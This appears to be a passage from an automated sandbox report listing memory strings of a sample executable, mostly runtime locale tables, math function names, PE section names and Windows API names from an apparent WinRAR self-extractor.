              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mm/dd/yymemstr_77b06fed-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dddd, mmmm dd, yyyymemstr_61e16c1f-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hh:mm:ssmemstr_bca5230e-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: infinfnannannan(snan)nan(snan)nan(ind)nan(ind)e+000sunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:sssunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:ssen-usmemstr_dec3e82d-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ((((( hmemstr_8fe53674-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ( memstr_21598023-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~memstr_fd9dd035-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~memstr_9f196d52-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: api-ms-win-appmodel-runtime-l1-1-1api-ms-win-core-datetime-l1-1-1api-ms-win-core-fibers-l1-1-1api-ms-win-core-file-l2-1-1api-ms-win-core-localization-l1-2-1api-ms-win-core-localization-obsolete-l1-2-0api-ms-win-core-processthreads-l1-1-2api-ms-win-core-string-l1-1-0api-ms-win-core-synch-l1-2-0api-ms-win-core-sysinfo-l1-2-1api-ms-win-core-winrt-l1-1-0api-ms-win-core-xstate-l2-1-0api-ms-win-rtcore-ntuser-window-l1-1-0api-ms-win-security-systemfunctions-l1-1-0ext-ms-win-kernel32-package-current-l1-1-0ext-ms-win-ntuser-dialogbox-l1-1-0ext-ms-win-ntuser-windowstation-l1-1-0advapi32kernel32user32memstr_80faac6e-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getcurrentpackageidmemstr_a7f700b2-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: lcmapstringexmemstr_9ba163d6-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: localenametolcidmemstr_85b8fdcb-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: localenametolcidhmemstr_71438475-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ja-jpzh-cnko-krzh-twukmemstr_0b119ba6-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: k#cd8l2memstr_8929893a-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: [aoni*{memstr_9088743a-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: elk(wmemstr_6278edef-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ~ $s%rmemstr_3f97f01a-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @b;zo]memstr_29a7ba13-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iu+-,memstr_ae1aef14-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: obwq4memstr_893d0004-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: v2!l.2memstr_c87f25d6-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ^<v7wmemstr_31637656-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#infmemstr_0c0bdc36-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#qnanmemstr_f3004736-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#snanmemstr_c4aa7bb3-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 1#indmemstr_ed708924-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ;01#inf1#qnan1#snan1#indmemstr_6c1da6df-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: arbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruridbesletlvltfavihyazeumkafkafohimskkkyswuzttpagutateknmrsamnglkoksyrdivar-sabg-bgca-escs-czda-dkde-deel-grfi-fifr-frhe-ilhu-huis-isit-itnl-nlnb-nopl-plpt-brro-roru-ruhr-hrsk-sksq-alsv-seth-thtr-trur-pkid-iduk-uabe-bysl-siet-eelv-lvlt-ltfa-irvi-vnhy-amaz-az-latneu-esmk-mktn-zaxh-zazu-zaaf-zaka-gefo-fohi-inmt-mtse-noms-mykk-kzky-kgsw-keuz-uz-latntt-rubn-inpa-ingu-inta-inte-inkn-inml-inmr-insa-inmn-mncy-gbgl-eskok-insyr-sydiv-mvquz-bons-zami-nzar-iqde-chen-gbes-mxfr-beit-chnl-benn-nopt-ptsr-sp-latnsv-fiaz-az-cyrlse-sems-bnuz-uz-cyrlquz-ecar-egzh-hkde-aten-aues-esfr-casr-sp-cyrlse-fiquz-pear-lyzh-sgde-luen-caes-gtfr-chhr-basmj-noar-dzzh-mode-lien-nzes-crfr-lubs-ba-latnsmj-sear-maen-iees-pafr-mcsr-ba-latnsma-noar-tnen-zaes-dosr-ba-cyrlsma-sear-omen-jmes-vesms-fiar-yeen-cbes-cosmn-fiar-syen-bzes-pear-joen-ttes-arar-lben-zwes-ecar-kwen-phes-clar-aees-uyar-bhes-pyar-qaes-boes-sves-hnes-nies-przh-chtsrmemstr_64f9355c-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: paf-zaar-aear-bhar-dzar-egar-iqar-joar-kwar-lbar-lyar-maar-omar-qaar-saar-syar-tnar-yeaz-az-cyrlaz-az-latnbe-bybg-bgbn-inbs-ba-latnca-escs-czcy-gbda-dkde-atde-chde-dede-lide-ludiv-mvel-gren-auen-bzen-caen-cben-gben-ieen-jmen-nzen-phen-tten-usen-zaen-zwes-ares-boes-cles-coes-cres-does-eces-eses-gtes-hnes-mxes-nies-paes-pees-pres-pyes-sves-uyes-veet-eeeu-esfa-irfi-fifo-fofr-befr-cafr-chfr-frfr-lufr-mcgl-esgu-inhe-ilhi-inhr-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inkok-inko-krky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-bnms-mymt-mtnb-nonl-benl-nlnn-nons-zapa-inpl-plpt-brpt-ptquz-boquz-ecquz-pero-roru-rusa-inse-fise-nose-sesk-sksl-sisma-nosma-sesmj-nosmj-sesmn-fisms-fisq-alsr-ba-cyrlsr-ba-latnsr-sp-cyrlsr-sp-latnsv-fisv-sesw-kesyr-syta-inte-inth-thtn-zatr-trtt-ruuk-uaur-pkuz-uz-cyrluz-uz-latnvi-vnxh-zazh-chszh-chtzh-cnzh-hkzh-mozh-sgzh-twzu-zamemstr_86a2d264-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: log10memstr_208caa71-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 0log10memstr_4a916912-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?0c0cmemstr_3d7b4fff-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loglog10exppowasinacossqrtmemstr_d95a7c4d-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?conout$memstr_80faf1bf-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 9=@$"memstr_18bf78ce-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?5wg4pmemstr_64894d2c-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bc .=memstr_20459722-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bc .=0memstr_67e45fcd-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <(lx memstr_e5c02daf-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #{ =`~r=memstr_26d6341f-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %s#[kmemstr_d50b677d-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: "b <1=memstr_024ddc2e-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #.x'=memstr_0f6fe130-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: #.x'=hbomemstr_4a789de4-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?tanhmemstr_2313a1e7-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: atan2memstr_17df9cd7-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: floormemstr_46636be6-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ldexpmemstr_f79f4f80-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _cabsmemstr_c124eb04-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _hypotmemstr_8cca7537-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: frexpmemstr_68905585-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _logbmemstr_24bf4b18-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: _nextaftermemstr_11335906-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ?tanhatanatan2sincostanceilfloorfabsmodfldexp_cabs_hypotfmodfrexp_y0_y1_yn_logb_nextaftermemstr_c6508989-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sinhcoshmemstr_604dbb5e-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: !rsdsmemstr_a26c8182-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: d:\projects\winrar\sfx\build\sfxrar32\release\sfxrar.pdbmemstr_a02000bb-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$dimemstr_f665a65c-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$dipmemstr_3f49a28d-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$mnmemstr_e3224b5f-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$xmemstr_89f4dd94-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: p .text$x`memstr_bd8ca968-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .text$ydmemstr_1e30353d-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$5memstr_eba8bc54-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .00cfgmemstr_e6f84cb5-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcamemstr_f1a8aadc-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcaamemstr_c8c9d7de-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xcumemstr_bbee7126-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @.crt$xcumemstr_724f0d16-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xczmemstr_73e2f150-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiamemstr_82c0b2df-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiaamemstr_bcbc138a-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xiacmemstr_ad8a78c8-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xicmemstr_543029ac-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xizmemstr_6b1075aa-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xlamemstr_9e36b197-2
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xlzmemstr_b829b956-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpamemstr_2ab88c9d-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpxmemstr_4f513dd4-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpxamemstr_9639145f-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xpzmemstr_9d5b0639-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xtamemstr_c1363ebc-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .crt$xtzmemstr_afa1f6ee-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .gfidsmemstr_49f84f86-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .gfidspmemstr_9f31a0b0-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdatamemstr_f3c843a8-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdatafmemstr_f7faab7a-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$tmemstr_65de450c-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$rmemstr_ac123ddc-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$r|hmemstr_ba50e3a3-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$sxdatamemstr_d397362a-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$voltmdmemstr_9fc9c00b-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$voltmd$kmemstr_8a751466-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rdata$zzzdbgmemstr_5ca9b304-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$iaamemstr_59615a28-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$izzmemstr_b19731e8-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$taamemstr_c6dcf503-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rtc$tzzmemstr_7216ed1d-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .tls$memstr_1b6f7a91-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .tls$zzzmemstr_ad79d50e-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .xdata$xmemstr_137b8bd0-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: l".xdata$x,rmemstr_b28ff5f1-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$2memstr_f3f6d2c8-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$2,smemstr_0fdbc9c9-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3memstr_200b06dc-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$3lsmemstr_a5deeb61-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$4memstr_7c8aa0b2-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$6memstr_8921bec2-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7memstr_6b939cd1-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$7p}memstr_abb232d7-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .edatamemstr_1637aef9-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: 4.edatamemstr_aeefe4df-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$2memstr_a9ef097c-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: <.idata$2memstr_3a0887ab-3
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$3memstr_ca55614d-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4memstr_332b5e65-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$4tmemstr_00b09de0-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .idata$6memstr_8583efa2-5
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .datamemstr_3cadb3fc-6
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rmemstr_b029ccf7-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rsmemstr_9581bf88-8
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .data$rs0memstr_d2424d5a-a
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .bsspmemstr_b19cf261-4
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .didat$5memstr_73444131-e
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$01memstr_aa91ade1-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .rsrc$02memstr_dead8aae-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagewmemstr_ad2811c7-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindowmemstr_ff7bb23f-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: showwindow'memstr_fda2456c-1
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemmemstr_3638333b-9
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlgitemtextwmemstr_a76e75a5-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enablewindowmemstr_c719140c-c
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowtextwmemstr_85f7e07b-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowtextwmemstr_303c105f-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowtextlengthwmemstr_29f7779a-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowtextlengthwdmemstr_b3a866ff-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getparentmemstr_322082d7-f
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowposmemstr_1c0103db-d
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setwindowpos~memstr_3b98c830-0
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsystemmetricsmemstr_84cf5dd0-b
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclientrectmemstr_bf1103a7-7
              Source: M1Y6kc9FpE.exe, 00000000.00000000.1379782636.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getwindowrectmemstr_5f0cc8b0-b
